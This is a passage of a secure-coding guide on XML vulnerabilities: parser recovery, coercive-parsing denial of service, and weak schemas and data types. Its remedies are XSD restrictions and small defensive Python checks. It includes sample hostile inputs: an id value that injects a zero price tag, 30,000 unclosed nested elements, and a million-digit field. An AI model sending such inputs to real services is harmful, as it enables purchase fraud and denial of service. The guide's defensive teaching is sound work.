Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
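&lt;br /&gt;
The integrity check mentioned above can be as simple as comparing a digest of the schema file with a value recorded in advance. The following Python sketch uses hashlib and hmac from the standard library; the function name schema_is_trusted and the sample bytes are hypothetical, and SHA-256 is a choice made for this example.&lt;br /&gt;

```python
import hashlib
import hmac


def schema_is_trusted(schema_bytes, pinned_sha256_hex):
    """Compare the SHA-256 digest of a schema with a digest pinned in advance."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    return hmac.compare_digest(actual, pinned_sha256_hex)


# Hypothetical schema contents; in practice this is the local copy of the schema file.
known_good = b"schema contents reviewed and approved"
pinned = hashlib.sha256(known_good).hexdigest()  # recorded once, stored out of band

print(schema_is_trusted(known_good, pinned))                 # True
print(schema_is_trusted(known_good + b" tampered", pinned))  # False
```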
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
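&lt;br /&gt;
The effect of a first-match lookup, and a structural check that rejects the injected document, can be sketched in Python. The trees are built with the ElementTree API rather than parsed from text; the helper names build_order and has_expected_structure are hypothetical, and a real application would enforce the structure with a schema as recommended above.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def build_order(children):
    """Build a buy element from (tag, text) pairs, in order."""
    root = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(root, tag).text = text
    return root


def has_expected_structure(root):
    """Accept only a buy element with exactly one id followed by one price."""
    return root.tag == "buy" and [child.tag for child in root] == ["id", "price"]


legitimate = build_order([("id", "123"), ("price", "10")])
injected = build_order([("id", "123"), ("price", "0"), ("id", ""), ("price", "10")])

# A first-match lookup silently picks the attacker's price.
print(injected.find("price").text)         # 0
print(has_expected_structure(legitimate))  # True
print(has_expected_structure(injected))    # False
```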
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
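&lt;br /&gt;
When the schema language cannot express these limits, the application has to enforce them itself. The Python sketch below is one possible check under stated assumptions: the three-character limit, the digits-only pattern (signs are not accepted here), and the maximum of 150 are illustrative values, and the function name parse_age is hypothetical.&lt;br /&gt;

```python
import re

AGE_PATTERN = re.compile(r"[0-9]{1,3}")  # digits only, at most three characters


def parse_age(text, maximum=150):
    """Return the age as an int, or raise ValueError for out-of-bounds input."""
    if not AGE_PATTERN.fullmatch(text):
        raise ValueError("age must be 1 to 3 digits")
    age = int(text)
    if age > maximum:
        raise ValueError("age is above the allowed maximum")
    return age


print(parse_age("42"))  # 42
try:
    parse_age("1" * 1_000_000)
except ValueError as error:
    print("rejected:", error)  # rejected: age must be 1 to 3 digits
```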
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
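&lt;br /&gt;
The difference between checking only the leading portion of a value and checking all of it can be illustrated with the base64 module from the Python standard library. This sketch is not a description of how the appliance above worked; the helper name is_strict_base64 and the sample values are assumptions made for this example.&lt;br /&gt;

```python
import base64
import binascii


def is_strict_base64(text):
    """Return True only if the whole value is valid base64."""
    try:
        base64.b64decode(text, validate=True)
        return True
    except binascii.Error:
        return False


print(is_strict_base64("QUJD"))      # True
print(is_strict_base64("QUJD!!??"))  # False: trailing characters are rejected
# Without validate=True, b64decode discards characters outside the alphabet,
# so the same trailing data is accepted silently.
print(base64.b64decode("QUJD!!??"))  # b'ABC'
```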
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid this logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
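&lt;br /&gt;
The arithmetic behind this logical flaw, and an application-side check that mirrors the positive-integer restriction, can be sketched in Python. The function name order_total is hypothetical, and the check is an illustration of the rule rather than a replacement for schema validation.&lt;br /&gt;

```python
from decimal import Decimal


def order_total(price, quantity):
    """Compute price * quantity after enforcing a positive integer quantity."""
    if isinstance(quantity, bool) or not isinstance(quantity, int):
        raise ValueError("quantity must be an integer")
    if not quantity > 0:
        raise ValueError("quantity must be greater than zero")
    return Decimal(price) * quantity


print(Decimal("10") * -1)    # -10: the total an unchecked negative quantity produces
print(order_total("10", 1))  # 10
```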
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers, so only values greater than zero will be considered valid. If a schema uses a less restrictive type, a denominator of zero may pass validation and trigger an error in the application.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These special values are useful in some contexts, but &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; are commonly chosen for elements that should hold only real numbers, such as prices. This is a common error in other programming languages as well, not only in these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
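Because &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; does not include &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, a price set to either of them fails validation and cannot trigger errors in the application. If those values are allowed, an attacker can exploit this issue.&lt;br /&gt;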
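&lt;br /&gt;
For illustration, consider a hypothetical message like the following (the values are assumptions chosen for this sketch). It would be valid if &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; were declared as &amp;lt;tt&amp;gt;xs:float&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;xs:double&amp;lt;/tt&amp;gt;, but the schema above rejects it because &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; is not a valid &amp;lt;tt&amp;gt;xs:decimal&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;NaN&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;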
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. A schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called an &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Where valid values must have one specific length (say, 8), the length can be fixed as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
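&lt;br /&gt;
Numeric values can be bounded in a similar way. As a minimal sketch, assuming an application that accepts at most 100 units per order (an illustrative limit, not taken from the examples above), the facet &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; sets the upper bound while the base type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; already excludes zero and negative numbers:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;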
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. XML schemas can enforce that syntax with pattern restrictions. Social security numbers (SSN) serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available since XSD 1.1, constrain the existence and values of related elements and attributes in XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will never be zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
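&lt;br /&gt;
The &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; facet requires a schema processor that supports XSD 1.1. Where only XSD 1.0 is available, one possible alternative (a sketch, not the only approach) is a union of the built-in types &amp;lt;tt&amp;gt;negativeInteger&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt;, which together cover every integer except zero:&lt;br /&gt;
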